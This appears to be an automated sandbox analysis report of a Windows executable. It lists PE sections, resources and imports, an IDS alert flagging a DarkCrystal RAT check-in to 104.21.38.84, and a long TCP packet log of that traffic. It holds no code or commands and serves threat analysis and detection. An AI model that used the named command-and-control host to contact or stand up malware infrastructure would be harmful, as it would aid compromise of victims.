.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0x85d8 | 0x8600 | f33f110be00a39f918462eefc6bb8c66 | False | 0.5896105410447762 | data | 6.282607140461814 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6d000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| PNG | 0x64584 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528 |
| PNG | 0x650cc | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495 |
| RT_ICON | 0x66678 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 |  |  | 0.7375886524822695 |
| RT_ICON | 0x66ae0 | 0x1128 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 |  |  | 0.5853825136612022 |
| RT_ICON | 0x67c08 | 0x2668 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 |  |  | 0.5399715215622457 |
| RT_DIALOG | 0x6a270 | 0x286 | data | English | United States | 0.5092879256965944 |
| RT_DIALOG | 0x6a4f8 | 0x13a | data | English | United States | 0.60828025477707 |
| RT_DIALOG | 0x6a634 | 0xec | data | English | United States | 0.6991525423728814 |
| RT_DIALOG | 0x6a720 | 0x12e | data | English | United States | 0.5927152317880795 |
| RT_DIALOG | 0x6a850 | 0x338 | data | English | United States | 0.45145631067961167 |
| RT_DIALOG | 0x6ab88 | 0x252 | data | English | United States | 0.5757575757575758 |
| RT_STRING | 0x6addc | 0x1e2 | data | English | United States | 0.3900414937759336 |
| RT_STRING | 0x6afc0 | 0x1cc | data | English | United States | 0.4282608695652174 |
| RT_STRING | 0x6b18c | 0x1b8 | data | English | United States | 0.45681818181818185 |
| RT_STRING | 0x6b344 | 0x146 | data | English | United States | 0.5153374233128835 |
| RT_STRING | 0x6b48c | 0x46c | data | English | United States | 0.3454063604240283 |
| RT_STRING | 0x6b8f8 | 0x166 | data | English | United States | 0.49162011173184356 |
| RT_STRING | 0x6ba60 | 0x152 | data | English | United States | 0.5059171597633136 |
| RT_STRING | 0x6bbb4 | 0x10a | data | English | United States | 0.49624060150375937 |
| RT_STRING | 0x6bcc0 | 0xbc | data | English | United States | 0.6329787234042553 |
| RT_STRING | 0x6bd7c | 0xd6 | data | English | United States | 0.5747663551401869 |
| RT_GROUP_ICON | 0x6be54 | 0x30 | data |  |  | 0.8541666666666666 |
| RT_MANIFEST | 0x6be84 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333 |

| DLL | Import |
|---|---|
| KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage |
| OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear |
| gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree |

| Language of compilation system | Country where language is spoken | Map |
|---|---|---|
| English | United States |  |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-04T11:07:37.094780+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 104.21.38.84 | 80 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                          Jan 4, 2025 11:07:50.664295912 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.745023012 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:50.888847113 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:50.998327017 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:51.049066067 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.606144905 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.606772900 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.611203909 CET8049748104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.611264944 CET4974880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.611550093 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.611613989 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.611726046 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.616503000 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.969275951 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:54.974242926 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.974256039 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:54.974263906 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.066816092 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.235723019 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.235768080 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.396816969 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.397656918 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.401762962 CET8049751104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.401806116 CET4975180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.402482033 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.402539015 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.402632952 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.407355070 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.748358965 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:55.753304958 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.753317118 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.753324986 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.848474026 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:55.938148022 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.015687943 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.020508051 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.020567894 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.020870924 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.025623083 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.028518915 CET8049752104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.030806065 CET4975280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.373337984 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.378181934 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.378472090 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.429419994 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.434290886 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.434349060 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.434451103 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.439162016 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.496519089 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.595103025 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.757910013 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.779599905 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:56.784498930 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.784507990 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.784516096 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.905772924 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:56.941431999 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.074405909 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.074640036 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.216401100 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.216666937 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.218015909 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.221488953 CET8049753104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.221602917 CET4975380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.221772909 CET8049754104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.221904039 CET4975480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.222773075 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.222862005 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.223012924 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.227793932 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.576494932 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.581429005 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.581445932 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.581459999 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.673707962 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:57.826395035 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:57.940002918 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.110089064 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.115489960 CET8049755104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.115544081 CET4975580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.117409945 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.122185946 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.122246981 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.122347116 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.127089024 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.467423916 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.472366095 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.472388983 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.472481012 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.566174030 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.638887882 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.825326920 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.935786009 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.992355108 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.993153095 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.997482061 CET8049757104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.997641087 CET4975780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.998018026 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:58.998100996 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:58.998178005 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.008729935 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.342278004 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.351298094 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.351321936 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.351331949 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.475691080 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.545141935 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.738610983 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.930341959 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.935451031 CET8049758104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.936934948 CET4975880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.941879034 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.946655989 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:07:59.946722031 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.946829081 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:07:59.951577902 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.295303106 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.300153017 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.300165892 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.300173998 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.414685965 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.623294115 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.682635069 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.732661009 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.857275009 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.862418890 CET8049769104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.862508059 CET4976980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.872039080 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.876919031 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:00.877003908 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.877168894 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:00.881990910 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.232722044 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.237660885 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.237673044 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.237680912 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.329539061 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.435791016 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.587917089 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.732666969 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.765899897 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.766514063 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.770926952 CET8049775104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.770967960 CET4977580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.771346092 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.771408081 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.771512032 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.776297092 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.825912952 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.830801964 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.830849886 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.830960035 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.832101107 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:01.835767031 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:01.881732941 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.145642996 CET8049781104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.148245096 CET4978180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.185900927 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.190798998 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.190810919 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.190857887 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.291271925 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.342012882 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.505383015 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.510448933 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.510508060 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.510622978 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.516999006 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.565619946 CET8049782104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.623533010 CET4978280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.913868904 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918694973 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918713093 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918749094 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918768883 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918773890 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918783903 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:02.918817043 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918828011 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:02.918845892 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:03.973232985 CET8049794104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.092050076 CET4979480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.235641956 CET8049794104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.312998056 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.356482029 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.356482983 CET4979480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.357017040 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.361427069 CET8049794104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.361496925 CET4979480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.361746073 CET8049788104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.361788988 CET4978880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.361819983 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.361872911 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.361984968 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.368421078 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.717119932 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:04.721920013 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.721932888 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.721942902 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.807271004 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:04.888941050 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.065165043 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.274300098 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.275007963 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.280050993 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.280108929 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.280210972 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.280925035 CET8049799104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.280968904 CET4979980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.285031080 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.639024973 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:05.643932104 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.643944025 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.643959045 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.739275932 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:05.795175076 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.003534079 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.092080116 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.121422052 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.124344110 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.126480103 CET8049804104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.126545906 CET4980480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.129255056 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.131191015 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.131302118 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.136027098 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.482825994 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.487967968 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.487977982 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.487987041 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.587717056 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.732701063 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.843142986 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.843257904 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.848014116 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.848083019 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.848189116 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.848294973 CET8049810104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.848339081 CET4981080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.853034973 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.968914032 CET4981880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.973690033 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:06.973808050 CET4981880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.973879099 CET4981880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:06.978692055 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.201652050 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.206423998 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.206497908 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.292663097 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.326549053 CET4981880192.168.2.4104.21.38.84
